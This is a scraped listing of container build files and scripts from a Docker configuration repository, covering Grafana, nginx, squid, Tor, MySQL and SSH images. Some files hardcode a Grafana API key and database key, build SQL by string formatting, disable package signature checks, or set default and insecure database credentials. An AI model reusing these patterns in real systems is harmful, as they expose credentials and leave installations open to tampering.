"text": "FROM alpine\n\nENV GRAFANA_VERSION=8.4.1\nRUN apk --no-cache add openssl wget\n\nENV PATH=/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \\\n GF_USER=\"grafana\" \\\n GF_GROUP=\"grafana\" \\\n GF_PATHS_CONFIG=\"/etc/grafana/grafana.ini\" \\\n GF_PATHS_DATA=\"/var/lib/grafana\" \\\n GF_PATHS_HOME=\"/usr/share/grafana\" \\\n GF_PATHS_LOGS=\"/var/log/grafana\" \\\n GF_PATHS_PLUGINS=\"/var/lib/grafana/plugins\" \\\n GF_PATHS_PROVISIONING=\"/etc/grafana/provisioning\"\n\nRUN mkdir /tmp/grafana ${GF_PATHS_HOME} \\\n && wget -q -P /tmp/ https://dl.grafana.com/oss/release/grafana-${GRAFANA_VERSION}.linux-amd64.tar.gz \\\n && tar xfz /tmp/grafana-${GRAFANA_VERSION}.linux-amd64.tar.gz --strip-components=1 -C ${GF_PATHS_HOME} \\\n && rm /tmp/grafana-${GRAFANA_VERSION}.linux-amd64.tar.gz\n\n\nRUN mkdir -p \"$GF_PATHS_HOME\"\nWORKDIR $GF_PATHS_HOME \n\nRUN set -ex \\\n && addgroup -S $GF_GROUP \\\n && adduser -S -G $GF_GROUP $GF_USER \\\n && apk add --no-cache libc6-compat ca-certificates su-exec bash\n\nCOPY ./config/grafana.ini \"$GF_PATHS_CONFIG\"\nCOPY ./run.sh /run.sh\n\nEXPOSE 3000\n\nCMD [\"/run.sh\"]\n"
},
{
"alpha_fraction": 0.6683416962623596,
"alphanum_fraction": 0.6817420721054077,
"avg_line_length": 48.75,
"blob_id": "dcf8c36e101e1ecf002b6562da9f126e901f439d",
"content_id": "b3aece1d1c0487d031be6db2a79e7485d80d438e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 251,
"num_lines": 12,
"path": "/suse-percona/grafana-postinstall.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -eu\n\n#service grafana-server start\n/etc/init.d/grafana-server start\n\npython /opt/import-dashboards.py\n\n# Apply interval fix\nsed -i 's/expr=\\(.\\)\\.replace(\\(.\\)\\.expr,\\(.\\)\\.scopedVars\\(.*\\)var \\(.\\)=\\(.\\)\\.interval/expr=\\1.replace(\\2.expr,\\3.scopedVars\\4var \\5=\\1.replace(\\6.interval, \\3.scopedVars)/' /usr/share/grafana/public/app/plugins/datasource/prometheus/datasource.js\nsed -i 's/,range_input/.replace(\\/\"{\\/g,\"\\\\\"\").replace(\\/}\"\\/g,\"\\\\\"\"),range_input/; s/step_input:\"\"/step_input:this.target.step/' /usr/share/grafana/public/app/plugins/datasource/prometheus/query_ctrl.js\n"
},
{
"alpha_fraction": 0.6972602605819702,
"alphanum_fraction": 0.7260273694992065,
"avg_line_length": 28.200000762939453,
"blob_id": "1f1555921502f6a8c2a3db7704b44722a13defc2",
"content_id": "1bb6f6785ad8af58f61a4b45e4ebbf9a59077a72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 730,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 25,
"path": "/suse-apache/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nAPACHE_VERSION=\"2.4.10\"\nAPACHE_MOUNT=\"/www\"\nAPACHE_CONF=\"/etc/apache2/conf.d\"\nAPACHE_DIR=\"/var/www\"\nAPACHE_LOG_DIR=\"/var/log/apache2\"\nAPACHE_USER=\"wwwrun\"\nAPACHE_GROUP=\"www\"\n\nAPACHE_INCLUDE_DIR=\"/etc/apache2/sysconfig.d\"\nchown -R $APACHE_USER:$APACHE_GROUP $APACHE_DIR\n\nmkdir $APACHE_INCLUDE_DIR\ntouch $APACHE_INCLUDE_DIR/include.conf\n\n#Specific to OpenSuse\nsed -i 's/DocumentRoot.*/DocumentRoot \"\\/var\\/www\"/g' /etc/apache2/default-server.conf\nsed -i -r 's/^upload_max_filesize.*$/upload_max_filesize = 20M/g' /etc/php5/apache2/php.ini\necho \"LoadModule php5_module /usr/lib64/apache2/mod_php5.so\" >> /etc/apache2/sysconfig.d/loadmodule.conf\n\na2enmod rewrite\na2enmod php \n\napache2ctl -D FOREGROUND\n"
},
{
"alpha_fraction": 0.5866873264312744,
"alphanum_fraction": 0.599071204662323,
"avg_line_length": 18.57575798034668,
"blob_id": "533b098fd3df82d7bbdb1b0017eb1da468997a8f",
"content_id": "6319eafb6eb602b7a1717fe90a87be154d4658dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 646,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 33,
"path": "/alpine-squid/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nset -e\n\ncreate_log_dir() {\n mkdir -p $SQUID_LOG_DIR\n chmod -R 755 $SQUID_LOG_DIR\n chown -R $SQUID_USER $SQUID_LOG_DIR\n}\n\ncreate_cache_dir () {\n mkdir -p $SQUID_CACHE_DIR\n chown -R $SQUID_USER $SQUID_CACHE_DIR\n squid -z -F &\n PID=$!\n wait $(pgrep -P $PID)\n}\n\ncreate_log_dir\ncreate_cache_dir\nsleep 5\n\n# default behaviour is to launch squid\nif [[ -z ${1} ]]; then\n if [[ ! -d ${SQUID_CACHE_DIR}/00 ]]; then\n echo \"Initializing cache...\"\n $(which squid) -N -f /etc/squid/squid.conf -z\n fi\n echo \"Starting squid...\"\n exec $(which squid) -f /etc/squid/squid.conf -NYCd 1 ${EXTRA_ARGS}\nelse\n exec \"$@\"\nfi\n"
},
{
"alpha_fraction": 0.6754385828971863,
"alphanum_fraction": 0.7258771657943726,
"avg_line_length": 29.399999618530273,
"blob_id": "273ff43efcbef256efdd1d751a0b2ac59b4a9fa2",
"content_id": "b30279739ac6c506b27026674b04f38b8baed94b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 30,
"path": "/suse-nginx/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\n\n# make sure the repositories are up to date\n#RUN cd /tmp/ && wget http://download.opensuse.org/repositories/home:/stargieg:/branches:/home:/microchip8/openSUSE_13.2/x86_64/nginx-1.7.7-13.1.x86_64.rpm\n#RUN rpm -ivh /tmp/nginx-1.7.7-13.1.x86_64.rpm\n#RUN systemctl enable nginx\nRUN zypper ar http://download.opensuse.org/repositories/home:/microchip8/openSUSE_Factory/ \"Micro Chip 8\"\nRUN zypper --no-gpg-checks install -y nginx\n\n\n\n#echo \"\\ndaemon off;\" >> /etc/nginx/nginx.conf && \\\n#chown -R www-data:www-data /var/lib/nginx\n\n# Define mountable directories.\nVOLUME [\"/etc/nginx/sites-enabled\", \"/etc/nginx/certs\", \"/etc/nginx/conf.d\", \"/var/log/nginx\", \"/var/www/html\"]\n\n# Define working directory.\nWORKDIR /etc/nginx\n\n# Define default command.\nCMD [\"nginx\"]\n\n# Expose ports.\nEXPOSE 80\nEXPOSE 443\n"
},
{
"alpha_fraction": 0.7156704068183899,
"alphanum_fraction": 0.723747968673706,
"avg_line_length": 29.950000762939453,
"blob_id": "9593dcdf9aae0bbc2debc416a9e131cc48f5ec4f",
"content_id": "7e6d77f304e59c01b9c92ead3d5dc99847adf13a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 20,
"path": "/suse-percona/qan-install.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -eu\n\n#service mysql start\n#/etc/init.d/mysql start\n/usr/sbin/mysqld --initialize-insecure --user=mysql\n/usr/sbin/mysqld --user=mysql &\nsleep 5\n\n# Create Orchestrator db.\nmysql -vv -e \"CREATE DATABASE IF NOT EXISTS orchestrator; GRANT ALL PRIVILEGES ON orchestrator.* TO 'orchestrator'@'localhost' IDENTIFIED BY 'orchestrator'\"\n\n# Install QAN API.\n# START=no SYSINT=no because Supervisor starts and manages these processes.\ncd /opt/qan-api\nSTART=\"no\" SYSINT=\"no\" ./install\n\n# Define /qan-api path for QAN app\nsed -i \"s/':9001',/':' + window.location.port + '\\/qan-api',/\" /opt/qan-app/client/app/app.js\n"
},
{
"alpha_fraction": 0.7361111044883728,
"alphanum_fraction": 0.7361111044883728,
"avg_line_length": 71,
"blob_id": "fb4dcf9d7e28fce26d21d7119e97f1cde3053d69",
"content_id": "a788821ed2bfa9f4379d9021d456e68591b1050d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 1,
"path": "/suse-gcc/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "docker run -d --name gcc -v /appsef/GIT/OPENSUSE:/var/data opensuse-gcc\n"
},
{
"alpha_fraction": 0.7439024448394775,
"alphanum_fraction": 0.7439024448394775,
"avg_line_length": 26.33333396911621,
"blob_id": "5f1792310b51694bdd9c326578da70f707486d0d",
"content_id": "35225dfeec55d915d9a7290bec95ccdc100a8f39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 21,
"path": "/alpine-nginx-fx/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine:latest\n\nRUN apk update && apk add bash nginx\nRUN rm -rf /var/cache/apk/*\n\n\nRUN mkdir /etc/nginx/global/\nCOPY default.conf /etc/nginx/conf.d/default.conf\nCOPY wordpress.conf /etc/nginx/global/wordpress.conf\nCOPY restrictions.conf /etc/nginx/global/restrictions.conf\nCOPY proxy.conf /etc/nginx/global/proxy.conf\nCOPY docker-entrypoint.sh /bin/entrypoint.sh\nRUN chmod +x /bin/entrypoint.sh\nRUN mkdir /var/www/html/\n\nVOLUME \"/var/www/html/\" \nVOLUME \"/etc/nginx/global/\" \n\nWORKDIR \"/var/www/html/\"\nENTRYPOINT [\"/bin/entrypoint.sh\"]\nCMD [\"nginx\", \"-g\", \"daemon off;\"]\n"
},
{
"alpha_fraction": 0.5562279224395752,
"alphanum_fraction": 0.5706000924110413,
"avg_line_length": 32.61016845703125,
"blob_id": "3502a7ee593f77b612385c1d97bc69649c99343c",
"content_id": "3f3057c9587da0499487e8dbbd8c831b2f006a72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3966,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 118,
"path": "/suse-percona/import-dashboards.py",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n# Grafana dashboard importer script.\n\nimport json\nimport os\nimport requests\nimport shutil\nimport sqlite3\nimport sys\nimport time\n\nDIR = '/opt/grafana-dashboards/dashboards/'\n\n\ndef main():\n host = 'http://127.0.0.1:3000'\n api_key = 'eyJrIjoiSjZXMmM0cUpQdFp0djJRUThWMlJzNlVXQmhwRjJvVm0iLCJuIjoiUE1NIERhc2hib2FyZCBJbXBvcnQiLCJpZCI6MX0='\n db_key = '6176c9bca5590c39fc29d54b4a72e9fac5e4e8fdb75965123668d420f7b07a2d9443ad60cb8d36a1084c0fc73f3c387c0415'\n headers = {'Authorization': 'Bearer %s' % (api_key,), 'Content-Type': 'application/json'}\n\n upgrade = False\n if len(sys.argv) > 1 and sys.argv[1] == 'upgrade':\n upgrade = True\n\n # On upgrade - check versions whether to re-import dashboards.\n if upgrade:\n ver1 = 'N/A'\n if os.path.exists('/var/lib/grafana/VERSION'):\n with open('/var/lib/grafana/VERSION', 'r') as f:\n ver1 = f.read().strip()\n\n with open('/opt/VERSION', 'r') as f:\n ver2 = f.read().strip()\n\n if ver1 == ver2:\n print '* The dashboards are up-to-date (%s).' % (ver1,)\n sys.exit(0)\n\n # Insert key into Grafana sqlite db.\n con = sqlite3.connect('/var/lib/grafana/grafana.db')\n cur = con.cursor()\n cur.execute(\"REPLACE INTO api_key (org_id, name, key, role, created, updated) \"\n \"VALUES (1, 'PMM Dashboard Import', '%s', 'Admin', datetime('now'), datetime('now'))\" % (db_key,))\n con.commit()\n\n # Wait for Grafana to start and get datasources.\n for _ in xrange(30):\n try:\n r = requests.get('%s/api/datasources' % (host,), headers=headers)\n except requests.exceptions.ConnectionError:\n print 'Waiting for Grafana to start...'\n time.sleep(1)\n else:\n break\n\n # Add datasources.\n ds = [x['name'] for x in json.loads(r.content)]\n if 'Prometheus' not in ds:\n data = json.dumps({'name': 'Prometheus', 'type': 'prometheus', 'url': 'http://127.0.0.1:9090/prometheus/', 'access': 'proxy', 'isDefault': True})\n r = requests.post('%s/api/datasources' % (host,), data=data, headers=headers)\n print r.status_code, r.content\n if r.status_code != 200:\n sys.exit(-1)\n\n if 'CloudWatch' not in ds:\n data = json.dumps({'name': 'CloudWatch', 'type': 'cloudwatch', 'jsonData': '{\"defaultRegion\":\"us-west-2\"}', 'access': 'proxy', 'isDefault': False})\n r = requests.post('%s/api/datasources' % (host,), data=data, headers=headers)\n print r.status_code, r.content\n if r.status_code != 200:\n sys.exit(-1)\n\n # Import dashboards with overwrite.\n files = []\n for f in os.listdir(DIR):\n if not f.endswith('.json'):\n continue\n\n files.append(DIR + f)\n\n for file_ in files:\n print file_\n f = open(file_, 'r')\n dash = json.load(f)\n f.close()\n\n # Set time range and refresh options.\n dash['time']['from'] = 'now-1h'\n dash['time']['to'] = 'now'\n dash['refresh'] = '1m'\n\n data = json.dumps({'dashboard': dash, 'overwrite': True})\n r = requests.post('%s/api/dashboards/db' % (host,), data=data, headers=headers)\n if r.status_code != 200:\n print r.status_code, r.content\n sys.exit(-1)\n\n # Set home dashboard.\n if not upgrade:\n cur.execute(\"REPLACE INTO star (user_id, dashboard_id) \"\n \"SELECT 1, id from dashboard WHERE slug='cross-server-graphs'\")\n cur.execute(\"REPLACE INTO preferences (id, org_id, user_id, version, home_dashboard_id, timezone, theme, created, updated) \"\n \"SELECT 1, 1, 1, 0, id, '', '', datetime('now'), datetime('now') from dashboard WHERE slug='cross-server-graphs'\")\n\n # Delete key.\n cur.execute(\"DELETE FROM api_key WHERE key='%s'\" % (db_key,))\n\n con.commit()\n con.close()\n\n # On upgrade - update VERSION file.\n if upgrade:\n shutil.copyfile('/opt/VERSION', '/var/lib/grafana/VERSION')\n print '* Dashboards upgraded successfully from version %s to %s.' % (ver1, ver2)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6160815358161926,
"alphanum_fraction": 0.6308040618896484,
"avg_line_length": 22.236841201782227,
"blob_id": "76f20f2c9811f03634b4fca5fea26c065d548078",
"content_id": "1c5d24ac2d46ff7facdf60d8e078895b93f7f7da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 38,
"path": "/alpine-nginx/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nset -e\n\n[[ $DEBUG == true ]] && set -x\n\ncreate_log_dir() {\n mkdir -p ${NGINX_LOG_DIR}\n chmod -R 0755 ${NGINX_LOG_DIR}\n chown -R ${NGINX_USER}:${NGINX_GROUP} ${NGINX_LOG_DIR}\n}\n\ncreate_tmp_dir(){\n mkdir -p ${NGINX_TEMP_DIR}\n chown -R ${NGINX_USER}:${NGINX_GROUP} ${NGINX_TEMP_DIR} \n}\n\ncreate_siteconf_dir() {\n mkdir -p ${NGINX_SITECONF_DIR}\n chmod -R 755 ${NGINX_SITECONF_DIR}\n}\n\nchange_owner_site_dir(){\n if [ ! -e \"${NGINX_SITE_DIR}\" ]; then\n mkdir -p ${NGINX_SITE_DIR}\n fi\n find ${NGINX_SITE_DIR} -type d -exec chmod 755 {} \\;\n find ${NGINX_SITE_DIR} -type f -exec chmod 644 {} \\;\n chown -R ${NGINX_USER}:${NGINX_GROUP} ${NGINX_SITE_DIR}\n}\n\ncreate_log_dir\ncreate_tmp_dir\ncreate_siteconf_dir\nchange_owner_site_dir\n\n# default behaviour is to launch nginx\necho \"Starting nginx...\"\nexec $(which nginx) -c /etc/nginx/nginx.conf -g \"daemon off;\" ${EXTRA_ARGS}\n"
},
{
"alpha_fraction": 0.7009708881378174,
"alphanum_fraction": 0.7106795907020569,
"avg_line_length": 31.1875,
"blob_id": "56de46a61d6b23090ebd9ddbad6ea25eb601cb15",
"content_id": "9f66752fe88d9040ad3fbe1694f8aff54c9886fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 16,
"path": "/centos-ssh/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM centos:8\nMAINTAINER ffx <[email protected]>\n\n\nENV TERM=xterm\nENV NOTVISIBLE \"in users profile\"\nRUN yum -y update && yum -y install openssh-server\nRUN /usr/bin/ssh-keygen -f /etc/ssh/ssh_host_ecdsa_key -N '' -t ecdsa\n\n# SSH login fix. Otherwise user is kicked off after login\nRUN sed 's@session\\s*required\\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd\nRUN echo \"export VISIBLE=now\" >> /etc/profile\nRUN sed -i 's/^#Port.*$/Port 77/g' /etc/ssh/sshd_config\n\nCMD [\"/usr/sbin/sshd\", \"-D\"]\nEXPOSE 77\n"
},
{
"alpha_fraction": 0.6634746789932251,
"alphanum_fraction": 0.6867305040359497,
"avg_line_length": 28.239999771118164,
"blob_id": "4d7be39cede38f17ca1178f5c7f1ed56a1e4a8b0",
"content_id": "b57b7f1da055e87d5005f83c8bcb088ece09ef1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 50,
"path": "/alpine-django-template/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "PROJECT=\"alpha3\"\nDIRECTORY=\"$HOME/Projects/Django\"\nSHARES=\"${PROJECT}\"\nIP_VHOST=\"10.11.66.1 10.11.12.1 192.168.0.43\"\nDOCKER_CMD=\"podman\"\nDOCKER_PORTS=\"83\"\nDOCKER_ARGS=\"--cpus=1 -m 1g\"\nDOCKER_IMG_NAME=\"django-template\"\nDOCKER_CNT_NAME=\"--name django-${PROJECT}\"\nDOCKER_CMD_ARGS=\"\"\n\n# Allow users to bind on low ports\nsudo sysctl -w net.ipv4.ip_unprivileged_port_start=0 &>/dev/null\n\n# Allow samba port on firewalld\nsudo firewall-cmd --add-service=http --permanent &>/dev/null\nsudo systemctl restart firewalld &>/dev/null\n\n# Allow users to limit cpu in systemd configuration (rootless)\nif [ ! -f \"/etc/systemd/system/user\\@.service.d/delegate.conf\" ] ; then\n sudo mkdir /etc/systemd/system/user\\@.service.d &>/dev/null\n cat << EOF | sudo tee /etc/systemd/system/user\\@.service.d/delegate.conf &>/dev/null\n[Service]\nDelegate=memory pids cpu io\nEOF\nsudo systemctl daemon-reload &>/dev/null\nfi\n\n# Bind port on multiple interface\nfor IP in ${IP_VHOST} ; do\n DOCKER_PORTS_BIND=\"${DOCKER_PORTS_BIND} -p ${IP}:${DOCKER_PORTS}:8000\"\ndone\n\n# Create local shares if not present\nfor SHARE in ${SHARES} ; do\n if [ ! -d \"${DIRECTORY}/${SHARE}\" ] ; then\n\tmkdir -p ${DIRECTORY}/${SHARE}\n fi\n DOCKER_VOLUMES=\"${DOCKER_VOLUMES} -v ${DIRECTORY}/${SHARE}:/code:Z\"\ndone\n\nCMD=\"${DOCKER_CMD} run --rm -it -d --hostname ${DOCKER_IMG_NAME} \\\n${DOCKER_ARGS} \\\n${DOCKER_CNT_NAME} \\\n${DOCKER_PORTS_BIND} \\\n${DOCKER_VOLUMES} \\\n${DOCKER_IMG_NAME} \\\n${DOCKER_CMD_ARGS}\"\n\n$CMD\n"
},
{
"alpha_fraction": 0.571090042591095,
"alphanum_fraction": 0.6350710988044739,
"avg_line_length": 16.58333396911621,
"blob_id": "7b75634a55453d2b185e22cd777a5bdb7e0b1474",
"content_id": "f9fb7f1fee388dc7ecbcfbf6eec87f38db7e657a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 24,
"path": "/suse-git/docker-run-server.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 ] ; then\n\techo \"Usage: $0 hostname\"\n\texit 1\nfi\n\n\nHOSTNAME=$1\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/git/$HOSTNAME\"\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n\tmkdir -p $ENV_DIRECTORY\nfi\n\ndocker run -it -d -h $HOSTNAME \\\n--name $HOSTNAME \\\n-p $VIP:22:22 \\\n-p $VIP:9418:9418 \\\n-p $VIP:80:80 \\\n-p $VIP:443:443 \\\n-v $ENV_DIRECTORY/repository:/data/repository \\\nsuse-git\n"
},
{
"alpha_fraction": 0.6975914239883423,
"alphanum_fraction": 0.7261373996734619,
"avg_line_length": 31.97058868408203,
"blob_id": "6fc556aab481c299e7914bf71ab012d5eea7ea77",
"content_id": "ba5951c93a60c645d7a1543052cb7c5825178b5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1121,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 34,
"path": "/alpine-tor/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine:latest\nLABEL 'label'='haproxy_tor'\n\nENV TOR_DIR=\"/haproxy_tor\"\nRUN apk update\nRUN apk upgrade\nRUN apk add \\\n haproxy ruby shadow bash-completion tor \\\n ruby-irb ruby-rake ruby-io-console ruby-bigdecimal ruby-json ruby-bundler ruby-dev \\\n --update \\\n --no-cache \\\n --repository http://dl-cdn.alpinelinux.org/alpine/edge/community \\\n --repository http://dl-cdn.alpinelinux.org/alpine/edge/main\n\nCMD mkdir -p $TOR_DIR/run_area/\nADD haproxy.cfg.erb $TOR_DIR/run_area/haproxy.cfg.erb\nADD proxy_setup.rb $TOR_DIR/run_area/proxy_setup.rb\nADD torrc.cfg.erb $TOR_DIR/run_area/torrc.cfg.erb\nADD run_haproxy_tor.rb $TOR_DIR/run_area/run_haproxy_tor.rb\nRUN chmod +x $TOR_DIR/run_area/run_haproxy_tor.rb\n\nENV haproxy_cfg_erb=$TOR_DIR/run_area/haproxy.cfg.erb\nENV haproxy_port=10000\nENV haproxy_stat_port=10100\nENV number_of_tors=10\nENV torrc_cfg_erb=$TOR_DIR/run_area/torrc.cfg.erb\nENV starting_tor_http_tunnel_port=15000\nENV tor_exit_node=us\nENV username=username\nENV password=password\n\nCMD ruby /haproxy_tor/run_area/run_haproxy_tor.rb\n\nEXPOSE 10000 10100 15000\n"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.6875,
"avg_line_length": 8.600000381469727,
"blob_id": "ce73f96f86505aa5245c0b15d726db8e24475ee2",
"content_id": "a232c6c224901bcf741ef42115c447489ef231bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 5,
"path": "/suse-torrent/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nwhile true ; do\n\tsleep 100000\ndone\n"
},
{
"alpha_fraction": 0.7123655676841736,
"alphanum_fraction": 0.7526881694793701,
"avg_line_length": 18.578947067260742,
"blob_id": "46cee6a4cc18dfe67519b45320fc78177bcd4d6c",
"content_id": "8c7e83a9983d036ce5b5eaa408ebb156f6c7b74a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/suse-ftp/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nRUN zypper in -y proftpd\n\n\nADD proftpd.conf /etc/proftpd/proftpd.conf\nADD entrypoint.sh /usr/bin/\nRUN chown root:root /etc/proftpd/proftpd.conf\nRUN chmod +x /usr/bin/entrypoint.sh\nRUN mkdir /ftp\n\nEXPOSE 21\nEXPOSE 20\n\n\nENTRYPOINT [\"/usr/bin/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6914893388748169,
"alphanum_fraction": 0.7234042286872864,
"avg_line_length": 19.434782028198242,
"blob_id": "0905784f0c129f442b9f7970a2331c137519033b",
"content_id": "721b6224945abd285b996dfa09b4aee9647cf6e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 470,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 23,
"path": "/alpine-squid/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nENV SQUID_VERSION=3.5.27 \\\n SQUID_CACHE_DIR=/var/cache/squid \\\n SQUID_LOG_DIR=/var/log/squid \\\n SQUID_USER=squid\n\n# make sure the repositories are up to date\nRUN apk update\nRUN apk add squid\nRUN rm -rf /var/cache/apk/*\n\nEXPOSE 3128\n\nCOPY squid.conf /etc/squid/squid.conf\nCOPY ads.regexp /etc/squid/\nCOPY entrypoint.sh /sbin/entrypoint.sh\nRUN chmod 755 /sbin/entrypoint.sh\n\nEXPOSE 3128/tcp\nVOLUME [\"${SQUID_CACHE_DIR}\"]\n\nCMD [\"/sbin/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.7067307829856873,
"alphanum_fraction": 0.7067307829856873,
"avg_line_length": 17.909090042114258,
"blob_id": "580564e70557ff9487d0cf67859a78a5f672b228",
"content_id": "c7c206fd4f3ab458548d6315345c5346c42aaa63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 11,
"path": "/alpine-rtorrent/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n \nENV TERM=xterm\nRUN apk update && apk add rtorrent\nRUN rm -rf /var/cache/apk/*\nRUN mkdir -p /var/data/\n\nCOPY rtorrent.rc /root/.rtorrent.rc\nVOLUME \"/var/data/\"\n\nENTRYPOINT [\"/usr/bin/rtorrent\"]\n"
},
{
"alpha_fraction": 0.7180851101875305,
"alphanum_fraction": 0.7553191781044006,
"avg_line_length": 22.5,
"blob_id": "1d2be7feafcbbce190dfdd23067d30e2db209e25",
"content_id": "5488695685ff83e1465fb4919f3c097c8fcdf3e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 376,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 16,
"path": "/suse-gcc/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nENV TERM=xterm\n\n# make sure the repositories are up to date\nRUN zypper in -y vim wget tar mlocate gcc make\nRUN zypper clean -a\n\nCOPY .bash_profile /root/\nCOPY entrypoint.sh /etc/entrypoint.sh\n\nRUN chmod 755 /etc/entrypoint.sh\nENTRYPOINT [\"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6726677417755127,
"alphanum_fraction": 0.6759411096572876,
"avg_line_length": 28.095237731933594,
"blob_id": "09205c3d03e70fc9fd98e26af6cbbd575ecc6fea",
"content_id": "ffd9140f279b56e2624b5a11072829fd1c96610a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 611,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 21,
"path": "/suse-mysql/entrypoint.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nMARIADB_USER=\"mysql\"\nMARIADB_GROUP=\"mysql\"\nVOLUME_HOME=\"/var/lib/mysql\"\nVOLUME_LOG=\"/var/log/mysql\"\n\nif [[ ! -d $VOLUME_HOME/mysql ]]; then\n echo \"=> An empty or uninitialized MariaDB volume is detected in $VOLUME_HOME\"\n echo \"=> Installing MariaDB ...\"\n mysql_install_db > /dev/null 2>&1\n chown -R $MARIADB_USER:$MARIADB_GROUP $VOLUME_HOME\n chown -R $MARIADB_USER:$MARIADB_GROUP $VOLUME_LOG\n echo \"=> Done!\" \n /etc/create_mariadb_admin_user.sh\nelse\n echo \"=> Using an existing volume of MariaDB\"\n chown -R $MARIADB_USER:$MARIADB_GROUP $VOLUME_HOME\nfi\n\nexec mysqld_safe\n"
},
{
"alpha_fraction": 0.5928143858909607,
"alphanum_fraction": 0.6180971264839172,
"avg_line_length": 22.85714340209961,
